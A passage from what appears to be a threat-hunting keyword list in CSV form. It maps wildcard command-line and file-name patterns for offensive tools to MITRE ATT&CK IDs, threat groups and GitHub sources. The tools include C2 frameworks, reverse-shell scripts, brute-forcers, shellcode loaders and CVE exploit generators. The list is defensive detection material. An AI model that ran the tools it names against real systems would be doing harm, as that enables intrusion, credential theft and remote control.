for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrdp-player.py*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*pyrit -e * create_essid*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -i *.txt import_passwords*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -r *.pcap attack_db*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pyrit -r *.pcap -b * -i *.txt attack_passthrough*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pysoserial.py*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*Pysoserial-main*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*PySplunkWhisperer2*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" +"*pystinger_for_darkshadow*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. 
Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*python 3 st teamserver *","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python -m http.server*","greyware_tool_keyword","http.server","setup a simple http server","T1021.005 - T1049","TA0009 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*python -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*python -m rarce *","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*python -m SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*python noPac.*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 
tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*python rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*python scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*python st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python tinar.py*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","0","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" +"*python* pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" +"*python*charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"*python*http://*:6970/ConfigFileCacheList.txt*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - 
TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python*'http://*SEP*:6970/*.cnf.xml*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python*https://*:8443/cucm-uds/users?name=*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" +"*python_modules/keyboard.zip*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1100","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*python2??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python2??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3 ./exp.py --url http://*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation 
tools","https://github.com/craig/SpringCore0day","1","0","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*python3 fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*python3 gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*python3 GetHash.py NtCreateFile*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*python3 -m orbitaldump *","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" +"*python3 -m S3Scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*python3 Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - 
TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*python3 pacu.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*python3 rsf.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*python3 scshell*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*python3 sitadel*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" +"*python3 st client wss://*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python3 st.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*python3*.exe .\nxc*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*python3??/generator.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3??/PyLoader.py*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*pywerview.py*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*pywhisker.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*pywhisker.py*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*pywhisker-main*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*pywsus.py*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
